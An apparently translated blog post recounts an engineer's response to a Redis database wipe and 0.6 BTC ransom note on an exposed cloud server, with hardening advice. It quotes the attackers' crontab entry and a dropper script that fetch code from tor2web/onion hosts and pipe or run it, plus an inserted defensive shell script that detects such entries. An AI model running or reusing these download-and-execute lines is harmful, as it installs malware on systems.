Once again, Redis was wiped and held to ransom, this time for 0.6 bitcoin.

2025-02-28 Update From: SLTechnology News&Howtos (Network Security)


Shulou(Shulou.com)06/01 Report--

I was out shopping with my wife when a colleague suddenly called to say the Redis database had been emptied.

So my wife said, "You really are a jinx. Just this morning you were talking about Redis privilege escalation. How did you know?"

"Maybe it was you?"

So, without noticing, I was taking the blame again.

Seeing Sister ××× so anxious, I calmed her down and reminded my colleagues to check: when did it happen, and how big is the affected area?

Sister ××× calmly replied, "No way, the Redis machines for our business on UCloud can't be accessed from outside the network. Port 6379 is closed to the outside on all of them; only local access is possible."

So I asked: is there a password? Sister ××× said that for the sake of development efficiency, in an intranet environment, naturally there was no password.

So I hurried back, logged on to the machine, and confirmed it through the UCloud console.

It turned out some idiot had opened one machine's Redis to the external network. Apart from a program that monitors scheduling, this ××× machine is completely isolated from the other machines.

Other than Redis, nothing on it is directly associated with any business, and this machine cannot connect to the Redis on other machines.

It holds no confidential core data.

Then, after logging in, this is what the machine shows:

Warning! Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail with your server IP Address and a Proof of Payment. Any eMail without your server IP Address and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! ! Mail:dbsecuritys@protonmail.com BitCoin:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny

If you run into this, don't panic: obviously they have no backup of your data, and paying will not get any data back.

Some people do pay; see the Alibaba Cloud official article referenced below for details.

For reference: at the time of writing, 1 BTC = 44871.5 yuan.

Damn it.

Out of habit, crontab -l first, and read it carefully, for fear that other commands had been tampered with.

54 * * * * (wget -qO- -U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || wget -qO- -U- http://ddgsdk6oou6znsdn.tor2web.me/i.sh || wget -qO- -U- https://ddgsdk6oou6znsdn.onion.pet/i.sh || wget -qO- -U- https://ddgsdk6oou6znsdn.onion.ws/i.sh) | bash

It looked quite clever, using dark-net addresses directly.
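The two weaknesses the post has described so far, a Redis with no password reachable over the network and a crontab entry that pulls a script from a Tor2web gateway into bash, can both be audited from the shell. This is an added example, not code from the post or from UCloud or Alibaba Cloud; the hostnames and file contents below are constructed samples.

```shell
#!/bin/sh
# Added example (not from the post). Both checks read text on stdin, so on a
# live host they can be fed from `crontab -l` and `cat /etc/redis/redis.conf`.

# Exit 0 when any cron line fetches from a tor2web/onion gateway with wget/curl,
# or pipes a wget/curl download straight into sh/bash.
cron_suspicious() {
    grep -Eiq '(wget|curl)[^|]*(tor2web|\.onion\.)|(wget|curl)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Print one line per weak redis.conf setting; exit 0 if any was found, 1 if none.
# The three settings together leave FLUSHALL open to anyone who reaches port 6379:
# no requirepass, bind on all interfaces, protected-mode off.
redis_conf_exposed() {
    conf=$(grep -Ev '^[[:space:]]*#')      # drop commented-out lines
    found=1
    if ! printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]'; then
        echo "no requirepass: any client that reaches the port can FLUSHALL"; found=0
    fi
    if ! printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*bind[[:space:]]+' ||
         printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*bind[[:space:]]+.*0\.0\.0\.0'; then
        echo "listening on all interfaces: only a firewall or cloud rule stands in the way"; found=0
    fi
    if printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*protected-mode[[:space:]]+no'; then
        echo "protected-mode no: non-loopback clients are accepted without a password"; found=0
    fi
    return $found
}

# Constructed samples (hypothetical hosts), modelled on what the post describes.
BAD_CRON='54 * * * * (wget -qO- -U- https://example.tor2web.invalid/i.sh || wget -qO- -U- https://example.onion.invalid/i.sh) | bash'
OK_CRON='0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1'
BAD_CONF='port 6379
bind 0.0.0.0
protected-mode no'
OK_CONF='port 6379
bind 127.0.0.1
protected-mode yes
requirepass replace-with-a-long-random-secret'

printf '%s\n' "$BAD_CRON" | cron_suspicious && echo "cron: download-and-execute entry found"
printf '%s\n' "$BAD_CONF" | redis_conf_exposed || true
```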

I also tried various settings to reach the dark-net address through onion routing, and found it could not be accessed.

A Google search turned up nothing but complaints.


It turned out this was not the only pitfall, which reminded me of the sad story of Hadoop YARN in the past.

I came across the article on Alibaba Cloud's Xianzhi ("Prophet") security community: so familiar, yet so strange.

Right after confirming the machine was compromised, we found it had happened at around 3:00 on Saturday.

Who on earth does this at that hour? It was puzzling, and we even wondered whether it was an insider. Log in to the machine and check.

On the machines whose Redis had been wiped, all the logs, last, messages and anything else you can think of from November 3, 2018 had been cleared.

The only difference between these machines and the one with the Redis port open is this:

"On these Redis machines all the data in root's home directory is still there, and there is no warning.txt."

The extent of the damage can be seen from the script in Alibaba Cloud's official article (although the script in our scheduled task only downloads the following).

It reads as follows:

exec &>/dev/null
if ! ps -p $(< /tmp/.X11-lock); then
  x=/var/tmp/.x
  wget -qU- http://malwregafeg2fdjn.tor2web.me/.$(uname -m) -O$x; chmod 777 $x; $x; rm -f $x
fi

The Alibaba Cloud article: "Wipe the database and run: Redis extortion incidents break out"

But looking at the article above and at the machines that were directly compromised, root's home directory was clearly deleted outright.

The script shows no sign of backing anything up to their servers.

Look at them: they can block it within 10 seconds. And you, useless UCloud, not a peep.

You could say there is a world of difference between the big vendors and the small ones.

There was no time to grieve or complain; my wife knew that the important data had already been moved elsewhere.

The next thing was to work out how the other Redis machines had been affected, and how to fix it.

According to colleagues, the data on the 5 machines was probably wiped directly with a flushdb on every one of them.

The only difference is that the file directories on all the purged Redis machines are still there, and there were no suspicious processes, let alone scheduled tasks.

If it was a *** remotely clearing the logs, why choose to clear only the logs of the day of the wipe, and only that day's login messages? Even so, we had to guard against the possibility that it was an insider's doing.

While there was hope of recovering the data, my wife was extremely unhappy that her shopping trip had been ruined.

Pretty and capable, she is naturally popular, and she felt very hard done by.

Although the access of everyone who left the company had been revoked, a neglected machine and some unknown people still managed to do damage to others and to themselves. Naturally, one suspects the motives of whoever is doing the sabotage.

For fear of an APT, I went through all the machines and all the key-based authentication.

So I recommend that the jumpserver strictly control permissions: even if you delete the logs on the host, so what, can you delete the logs on my jump host?

After all, that account's privileges were so broad, and several people were suspected of having logged in, that it was hard to pin down.

When something goes wrong, most developers only care that "I can't use it right now". As for what actually happened, probably nobody cares.

In this case, my own feeling is that my every line of thought starts from a security perspective, while my wife, as a big-data operations engineer, starts from an operations perspective.

So there are differences. For example, she thinks it must be an insider, and of course that probability is high; she analyses it from the present moment. But in the security direction there is one thing more terrifying than anything else, and that is an APT.

They are in no hurry to hit you: they bury themselves here, spend a long time collecting and analysing your business, *** your machines; after all, the enemy is in the dark and you are in the open.

If it was an insider, why write someone else's bitcoin address? So every angle of the modus operandi is still full of doubt.

What can be done is to replace the jump host and apply least-privilege authorization. Finally, I suggested honeypots.

In fact, the hardest thing to manage, whether people or technology, is any neglected corner: a blind spot that is easy to overlook can become the entry point for attackers to wreak havoc.

And for a technical person, every profession has its specialty; however smart you are, you will never be absolutely safe.

Do you still remember what the Tsinghua-graduate CTO said to me when I first entered the workplace? "Do you know how heavy the burden on your shoulders is?"

My answer was yes: because I have root privileges...
